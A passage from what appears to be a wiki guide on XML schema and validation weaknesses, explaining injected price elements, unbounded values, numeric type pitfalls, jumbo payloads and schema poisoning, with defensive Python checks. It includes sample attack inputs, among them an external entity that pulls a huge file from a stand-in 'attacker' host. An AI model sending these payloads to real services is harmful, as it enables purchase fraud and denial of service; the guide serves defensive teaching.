Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and set a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
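A structural check of this kind can be sketched in a few lines of Python. The sketch assumes the document must be a &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; root with exactly one &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; followed by exactly one &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, as in the sample above; the function name &amp;lt;tt&amp;gt;is_expected_buy&amp;lt;/tt&amp;gt; is hypothetical. It is not a replacement for schema validation, and the standard library parser used here is not hardened against every malicious input:&lt;br /&gt;
&lt;br /&gt;
```python
import xml.etree.ElementTree as ET

# Child elements allowed under buy, in the order assumed from the sample.
EXPECTED_CHILDREN = ["id", "price"]


def is_expected_buy(document):
    """Return True only for a buy root holding one id and then one price."""
    root = ET.fromstring(document)
    if root.tag != "buy":
        return False
    if [child.tag for child in root] != EXPECTED_CHILDREN:
        return False
    # Neither id nor price may contain nested elements.
    return all(len(child) == 0 for child in root)
```
&lt;br /&gt;
With this check, the manipulated document is rejected because it contains four child elements instead of two.&lt;br /&gt;
&lt;br /&gt;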
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
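When the schema language cannot express such limits, the application has to enforce them itself. The following Python sketch shows the kind of restriction that the DTD above cannot state for &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;; the three-digit limit, the maximum of 150, and the name &amp;lt;tt&amp;gt;is_valid_age&amp;lt;/tt&amp;gt; are assumptions chosen for illustration:&lt;br /&gt;
&lt;br /&gt;
```python
import re

# Assumed limits: one to three ASCII digits, no sign.
AGE_PATTERN = re.compile(r"[0-9]{1,3}")


def is_valid_age(text, maximum=150):
    """Return True if text is a short run of digits not above maximum."""
    if AGE_PATTERN.fullmatch(text) is None:
        # Rejects empty values, signs, letters, and overlong digit strings
        # before any conversion to a number is attempted.
        return False
    return maximum >= int(text)
```
&lt;br /&gt;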
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
 &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might produce a negative result on the user’s account. To avoid that logical vulnerability, use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are data types for XML schemas that specifically exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
     &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
         &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
         &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
         &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
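Because &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; does not include &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, a price set to either value is rejected during validation and never reaches the application. If a schema allows those values, an attacker can exploit the issue.&lt;br /&gt;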
&lt;br /&gt;
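The same care is needed in application code, because number types outside XML Schema may accept the special values again. As an illustration, Python's &amp;lt;tt&amp;gt;Decimal&amp;lt;/tt&amp;gt; type parses both &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt;, so an explicit check is required. The sketch below is an assumption about how an application might guard a price; the name &amp;lt;tt&amp;gt;parse_price&amp;lt;/tt&amp;gt; is hypothetical, and the accepted syntax is that of Python, which is wider than the lexical space of &amp;lt;tt&amp;gt;xs:decimal&amp;lt;/tt&amp;gt;:&lt;br /&gt;
&lt;br /&gt;
```python
from decimal import Decimal, InvalidOperation


def parse_price(text):
    """Return a finite, non-negative Decimal or raise ValueError."""
    try:
        value = Decimal(text)
    except InvalidOperation:
        raise ValueError("not a number: %r" % text) from None
    if not value.is_finite():
        # Decimal accepts NaN and Infinity, so they are rejected here.
        raise ValueError("special value rejected: %r" % text)
    if value.is_signed():
        # is_signed() is also true for negative zero.
        raise ValueError("negative price rejected: %r" % text)
    return value
```
&lt;br /&gt;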
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to a certain specific length (let's say 8), this value can be specified as follows to be valid:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:pattern value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only numbers between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed as values for a SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an assertion disallowing the number zero:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:assertion test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences forces the application to cope with whatever happens when it receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;buy&amp;quot; maxOccurs=&amp;quot;unbounded&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:all&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an unbounded value.&lt;br /&gt;
&lt;br /&gt;
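Where the schema cannot be changed, the application can enforce its own ceiling while streaming the document. The following Python sketch counts &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements as they are parsed and stops once an assumed limit is passed; the function name &amp;lt;tt&amp;gt;count_buy_elements&amp;lt;/tt&amp;gt; and the default limit of 1000 are hypothetical:&lt;br /&gt;
&lt;br /&gt;
```python
import io
import xml.etree.ElementTree as ET


def count_buy_elements(data, limit=1000):
    """Stream data (bytes) and count buy elements, stopping past limit."""
    count = 0
    for _event, element in ET.iterparse(io.BytesIO(data), events=("end",)):
        if element.tag == "buy":
            count += 1
            if count > limit:
                raise ValueError("more than %d buy elements" % limit)
            # Drop the children of the element that was just counted so
            # memory use does not grow with the size of the document.
            element.clear()
    return count
```
&lt;br /&gt;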
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER LARGENAME1=&amp;quot;LARGEVALUE&amp;quot; LARGENAME2=&amp;quot; LARGEVALUE&amp;quot; LARGENAME3=&amp;quot; LARGEVALUE&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE includeme [&lt;br /&gt;
  &amp;lt;!ENTITY file SYSTEM &amp;quot;http://attacker/huge.xml&amp;quot; &amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;includeme&amp;gt;&amp;amp;file;&amp;lt;/includeme&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
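One possible defense against the small payload above is to refuse any document that declares a &amp;lt;tt&amp;gt;DOCTYPE&amp;lt;/tt&amp;gt;, so that no entity is ever defined or fetched. The following Python sketch uses the standard &amp;lt;tt&amp;gt;xml.parsers.expat&amp;lt;/tt&amp;gt; module; the names &amp;lt;tt&amp;gt;parse_without_doctype&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;DoctypeForbidden&amp;lt;/tt&amp;gt; are assumptions, and the approach only fits applications that never need a DTD:&lt;br /&gt;
&lt;br /&gt;
```python
import xml.parsers.expat


class DoctypeForbidden(Exception):
    """Raised when a document contains a DOCTYPE declaration."""


def parse_without_doctype(data):
    """Parse data and return True, or raise DoctypeForbidden on a DOCTYPE."""

    def reject(name, system_id, public_id, has_internal_subset):
        # expat calls this handler when the DOCTYPE declaration starts,
        # before any entity declared inside it can be used.
        raise DoctypeForbidden(name)

    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = reject
    parser.Parse(data, True)
    return True
```
&lt;br /&gt;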
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document.&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
